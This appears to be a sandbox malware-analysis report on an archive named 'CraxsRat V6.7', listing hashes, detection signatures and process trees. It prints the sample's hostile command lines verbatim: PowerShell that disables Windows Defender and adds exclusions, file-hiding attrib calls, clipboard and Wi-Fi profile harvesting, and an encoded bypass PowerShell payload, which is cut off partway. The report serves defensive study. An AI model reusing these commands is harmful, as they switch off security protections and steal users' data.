Analysis
-
max time kernel
1198s -
max time network
1175s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
22-05-2024 16:01
Behavioral task
behavioral1
Sample
CraxsRat V6.7.rar
Resource
win10v2004-20240508-en
General
-
Target
CraxsRat V6.7.rar
-
Size
224.5MB
-
MD5
16486345e6b20f7ae900fb02b89f3b08
-
SHA1
a9125234f9ff3618bde6d59a7a139ab34ecfc9ec
-
SHA256
46cee2ff6c518b75b82f818002e3434c72f12539ad07995c77e383ef52fb33fa
-
SHA512
21f57b4e40a4035bb5d97b08d1523b097ccfa37056af7ca3aa342af50f5b614ff1bdf1faf6a307268dcb006faa1fda0562963ec60066e519449b9280a9675276
-
SSDEEP
6291456:Crxm6Seo6ykkRm0yP8SkmYZoryFWDXFEe:Cr97d78WQWJEe
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 3636 powershell.exe 928 powershell.exe 1888 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exeCraxsRat.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts CraxsRat.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Executes dropped EXE 4 IoCs
Processes:
CraxsRat.exeCraxsRat.exerar.exez.exepid process 4624 CraxsRat.exe 3156 CraxsRat.exe 1348 rar.exe 3264 z.exe -
Loads dropped DLL 16 IoCs
Processes:
CraxsRat.exepid process 3156 CraxsRat.exe 3156 CraxsRat.exe 3156 CraxsRat.exe 3156 CraxsRat.exe 3156 CraxsRat.exe 3156 CraxsRat.exe 3156 CraxsRat.exe 3156 CraxsRat.exe 3156 CraxsRat.exe 3156 CraxsRat.exe 3156 CraxsRat.exe 3156 CraxsRat.exe 3156 CraxsRat.exe 3156 CraxsRat.exe 3156 CraxsRat.exe 3156 CraxsRat.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral2/memory/3264-1296-0x000002CBC8950000-0x000002CBC8A88000-memory.dmp agile_net -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI46242\python310.dll upx behavioral2/memory/3156-1045-0x00007FFA49AF0000-0x00007FFA49F56000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI46242\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46242\libffi-7.dll upx behavioral2/memory/3156-1052-0x00007FFA635D0000-0x00007FFA635DF000-memory.dmp upx behavioral2/memory/3156-1050-0x00007FFA5AD90000-0x00007FFA5ADB4000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI46242\libcrypto-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI46242\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46242\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46242\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46242\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46242\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46242\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46242\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46242\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46242\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46242\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI46242\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI46242\sqlite3.dll upx behavioral2/memory/3156-1074-0x00007FFA5A620000-0x00007FFA5A64C000-memory.dmp upx behavioral2/memory/3156-1079-0x00007FFA5A440000-0x00007FFA5A45F000-memory.dmp upx behavioral2/memory/3156-1080-0x00007FFA55E30000-0x00007FFA55FAA000-memory.dmp upx behavioral2/memory/3156-1078-0x00007FFA5AA20000-0x00007FFA5AA38000-memory.dmp upx behavioral2/memory/3156-1082-0x00007FFA596B0000-0x00007FFA596C9000-memory.dmp upx behavioral2/memory/3156-1084-0x00007FFA635C0000-0x00007FFA635CD000-memory.dmp upx behavioral2/memory/3156-1088-0x00007FFA570B0000-0x00007FFA570DE000-memory.dmp upx behavioral2/memory/3156-1089-0x00007FFA48920000-0x00007FFA48C99000-memory.dmp upx behavioral2/memory/3156-1090-0x00007FFA4FAE0000-0x00007FFA4FB98000-memory.dmp upx behavioral2/memory/3156-1094-0x00007FFA5E940000-0x00007FFA5E94D000-memory.dmp upx behavioral2/memory/3156-1093-0x00007FFA50DA0000-0x00007FFA50DB5000-memory.dmp upx behavioral2/memory/3156-1107-0x00007FFA42FC0000-0x00007FFA430D8000-memory.dmp upx behavioral2/memory/3156-1279-0x00007FFA49AF0000-0x00007FFA49F56000-memory.dmp upx behavioral2/memory/3156-1306-0x00007FFA5AD90000-0x00007FFA5ADB4000-memory.dmp upx behavioral2/memory/3156-1333-0x00007FFA42FC0000-0x00007FFA430D8000-memory.dmp upx behavioral2/memory/3156-1334-0x00007FFA635D0000-0x00007FFA635DF000-memory.dmp upx behavioral2/memory/3156-1329-0x00007FFA48920000-0x00007FFA48C99000-memory.dmp upx behavioral2/memory/3156-1330-0x00007FFA4FAE0000-0x00007FFA4FB98000-memory.dmp upx behavioral2/memory/3156-1328-0x00007FFA570B0000-0x00007FFA570DE000-memory.dmp upx behavioral2/memory/3156-1325-0x00007FFA55E30000-0x00007FFA55FAA000-memory.dmp upx behavioral2/memory/3156-1324-0x00007FFA5A440000-0x00007FFA5A45F000-memory.dmp upx behavioral2/memory/3156-1319-0x00007FFA49AF0000-0x00007FFA49F56000-memory.dmp upx behavioral2/memory/3156-1326-0x00007FFA596B0000-0x00007FFA596C9000-memory.dmp upx behavioral2/memory/3156-1504-0x00007FFA49AF0000-0x00007FFA49F56000-memory.dmp upx behavioral2/memory/3156-1509-0x00007FFA5A440000-0x00007FFA5A45F000-memory.dmp upx behavioral2/memory/3156-1513-0x00007FFA570B0000-0x00007FFA570DE000-memory.dmp upx behavioral2/memory/3156-1518-0x00007FFA42FC0000-0x00007FFA430D8000-memory.dmp upx behavioral2/memory/3156-1517-0x00007FFA5E940000-0x00007FFA5E94D000-memory.dmp upx behavioral2/memory/3156-1516-0x00007FFA50DA0000-0x00007FFA50DB5000-memory.dmp upx behavioral2/memory/3156-1515-0x00007FFA4FAE0000-0x00007FFA4FB98000-memory.dmp upx behavioral2/memory/3156-1514-0x00007FFA48920000-0x00007FFA48C99000-memory.dmp upx behavioral2/memory/3156-1512-0x00007FFA635C0000-0x00007FFA635CD000-memory.dmp upx behavioral2/memory/3156-1511-0x00007FFA596B0000-0x00007FFA596C9000-memory.dmp upx behavioral2/memory/3156-1510-0x00007FFA55E30000-0x00007FFA55FAA000-memory.dmp upx behavioral2/memory/3156-1508-0x00007FFA5AA20000-0x00007FFA5AA38000-memory.dmp upx behavioral2/memory/3156-1507-0x00007FFA5A620000-0x00007FFA5A64C000-memory.dmp upx behavioral2/memory/3156-1506-0x00007FFA635D0000-0x00007FFA635DF000-memory.dmp upx behavioral2/memory/3156-1505-0x00007FFA5AD90000-0x00007FFA5ADB4000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
z.exepid process 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe 3264 z.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 1080 tasklist.exe 692 tasklist.exe 2032 tasklist.exe 404 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies registry class 5 IoCs
Processes:
cmd.exeOpenWith.exez.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.apk\DefaultIcon z.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.apk z.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.apk\DefaultIcon\ = "C:\\Users\\Admin\\Desktop\\CraxsRat V6.7\\CraxsRat VIP\\CraxsRat VIP\\res\\Icons\\apk.ico" z.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 928 powershell.exe 2220 powershell.exe 928 powershell.exe 3636 powershell.exe 3636 powershell.exe 2220 powershell.exe 1136 powershell.exe 1136 powershell.exe 1888 powershell.exe 1888 powershell.exe 1136 powershell.exe 1888 powershell.exe 3888 powershell.exe 3888 powershell.exe 4524 powershell.exe 4524 powershell.exe 3360 powershell.exe 3360 powershell.exe 4268 powershell.exe 4268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zG.exepowershell.exepowershell.exepowershell.exetasklist.exetasklist.exeWMIC.exepowershell.exetasklist.exepowershell.exetasklist.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeRestorePrivilege 1200 7zG.exe Token: 35 1200 7zG.exe Token: SeSecurityPrivilege 1200 7zG.exe Token: SeSecurityPrivilege 1200 7zG.exe Token: SeDebugPrivilege 928 powershell.exe Token: SeDebugPrivilege 2220 powershell.exe Token: SeDebugPrivilege 3636 powershell.exe Token: SeDebugPrivilege 1080 tasklist.exe Token: SeDebugPrivilege 692 tasklist.exe Token: SeIncreaseQuotaPrivilege 996 WMIC.exe Token: SeSecurityPrivilege 996 WMIC.exe Token: SeTakeOwnershipPrivilege 996 WMIC.exe Token: SeLoadDriverPrivilege 996 WMIC.exe Token: SeSystemProfilePrivilege 996 WMIC.exe Token: SeSystemtimePrivilege 996 WMIC.exe Token: SeProfSingleProcessPrivilege 996 WMIC.exe Token: SeIncBasePriorityPrivilege 996 WMIC.exe Token: SeCreatePagefilePrivilege 996 WMIC.exe Token: SeBackupPrivilege 996 WMIC.exe Token: SeRestorePrivilege 996 WMIC.exe Token: SeShutdownPrivilege 996 WMIC.exe Token: SeDebugPrivilege 996 WMIC.exe Token: SeSystemEnvironmentPrivilege 996 WMIC.exe Token: SeRemoteShutdownPrivilege 996 WMIC.exe Token: SeUndockPrivilege 996 WMIC.exe Token: SeManageVolumePrivilege 996 WMIC.exe Token: 33 996 WMIC.exe Token: 34 996 WMIC.exe Token: 35 996 WMIC.exe Token: 36 996 WMIC.exe Token: SeDebugPrivilege 1136 powershell.exe Token: SeIncreaseQuotaPrivilege 996 WMIC.exe Token: SeSecurityPrivilege 996 WMIC.exe Token: SeTakeOwnershipPrivilege 996 WMIC.exe Token: SeLoadDriverPrivilege 996 WMIC.exe Token: SeSystemProfilePrivilege 996 WMIC.exe Token: SeSystemtimePrivilege 996 WMIC.exe Token: SeProfSingleProcessPrivilege 996 WMIC.exe Token: SeIncBasePriorityPrivilege 996 WMIC.exe Token: SeCreatePagefilePrivilege 996 WMIC.exe Token: SeBackupPrivilege 996 WMIC.exe Token: SeRestorePrivilege 996 WMIC.exe Token: SeShutdownPrivilege 996 WMIC.exe Token: SeDebugPrivilege 996 WMIC.exe Token: SeSystemEnvironmentPrivilege 996 WMIC.exe Token: SeRemoteShutdownPrivilege 996 WMIC.exe Token: SeUndockPrivilege 996 WMIC.exe Token: SeManageVolumePrivilege 996 WMIC.exe Token: 33 996 WMIC.exe Token: 34 996 WMIC.exe Token: 35 996 WMIC.exe Token: 36 996 WMIC.exe Token: SeDebugPrivilege 2032 tasklist.exe Token: SeDebugPrivilege 1888 powershell.exe Token: SeDebugPrivilege 404 tasklist.exe Token: SeDebugPrivilege 3888 powershell.exe Token: SeDebugPrivilege 4524 powershell.exe Token: SeIncreaseQuotaPrivilege 1932 WMIC.exe Token: SeSecurityPrivilege 1932 WMIC.exe Token: SeTakeOwnershipPrivilege 1932 WMIC.exe Token: SeLoadDriverPrivilege 1932 WMIC.exe Token: SeSystemProfilePrivilege 1932 WMIC.exe Token: SeSystemtimePrivilege 1932 WMIC.exe Token: SeProfSingleProcessPrivilege 1932 WMIC.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
7zG.exez.exepid process 1200 7zG.exe 3264 z.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
z.exepid process 3264 z.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
OpenWith.exepid process 5040 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
CraxsRat.exeCraxsRat.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4624 wrote to memory of 3156 4624 CraxsRat.exe CraxsRat.exe PID 4624 wrote to memory of 3156 4624 CraxsRat.exe CraxsRat.exe PID 3156 wrote to memory of 1720 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 1720 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 3488 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 3488 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 5084 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 5084 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 1552 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 1552 3156 CraxsRat.exe cmd.exe PID 1720 wrote to memory of 928 1720 cmd.exe powershell.exe PID 1720 wrote to memory of 928 1720 cmd.exe powershell.exe PID 3488 wrote to memory of 2220 3488 cmd.exe powershell.exe PID 3488 wrote to memory of 2220 3488 cmd.exe powershell.exe PID 3156 wrote to memory of 1208 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 1208 3156 CraxsRat.exe cmd.exe PID 5084 wrote to memory of 4072 5084 cmd.exe mshta.exe PID 5084 wrote to memory of 4072 5084 cmd.exe mshta.exe PID 1552 wrote to memory of 3500 1552 cmd.exe attrib.exe PID 1552 wrote to memory of 3500 1552 cmd.exe attrib.exe PID 1208 wrote to memory of 3636 1208 cmd.exe powershell.exe PID 1208 wrote to memory of 3636 1208 cmd.exe powershell.exe PID 3156 wrote to memory of 3948 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 3948 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 3644 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 3644 3156 CraxsRat.exe cmd.exe PID 3644 wrote to memory of 1080 3644 cmd.exe tasklist.exe PID 3644 wrote to memory of 1080 3644 cmd.exe tasklist.exe PID 3948 wrote to memory of 692 3948 cmd.exe tasklist.exe PID 3948 wrote to memory of 692 3948 cmd.exe tasklist.exe PID 3156 wrote to memory of 1832 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 1832 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 3940 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 3940 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 3860 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 3860 3156 CraxsRat.exe cmd.exe PID 1832 wrote to memory of 996 1832 cmd.exe WMIC.exe PID 1832 wrote to memory of 996 1832 cmd.exe WMIC.exe PID 3940 wrote to memory of 1136 3940 cmd.exe powershell.exe PID 3940 wrote to memory of 1136 3940 cmd.exe powershell.exe PID 3156 wrote to memory of 3724 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 3724 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 5040 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 5040 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 1796 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 1796 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 2304 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 2304 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 1696 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 1696 3156 CraxsRat.exe cmd.exe PID 3860 wrote to memory of 2032 3860 cmd.exe tasklist.exe PID 3860 wrote to memory of 2032 3860 cmd.exe tasklist.exe PID 3724 wrote to memory of 4696 3724 cmd.exe tree.com PID 3724 wrote to memory of 4696 3724 cmd.exe tree.com PID 1796 wrote to memory of 4728 1796 cmd.exe systeminfo.exe PID 1796 wrote to memory of 4728 1796 cmd.exe systeminfo.exe PID 2304 wrote to memory of 708 2304 cmd.exe reg.exe PID 2304 wrote to memory of 708 2304 cmd.exe reg.exe PID 1696 wrote to memory of 1888 1696 cmd.exe powershell.exe PID 1696 wrote to memory of 1888 1696 cmd.exe powershell.exe PID 5040 wrote to memory of 1528 5040 cmd.exe netsh.exe PID 5040 wrote to memory of 1528 5040 cmd.exe netsh.exe PID 3156 wrote to memory of 2128 3156 CraxsRat.exe cmd.exe PID 3156 wrote to memory of 2128 3156 CraxsRat.exe cmd.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 1220 attrib.exe 3500 attrib.exe 4968 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\CraxsRat V6.7.rar"1⤵
- Modifies registry class
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\CraxsRat V6.7\" -spe -an -ai#7zMap16116:84:7zEvent259111⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\ID.txt1⤵
-
C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe"C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe"C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Fatal error ! ', 0, 'CraxsRat', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Fatal error ! ', 0, 'CraxsRat', 0+16);close()"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABv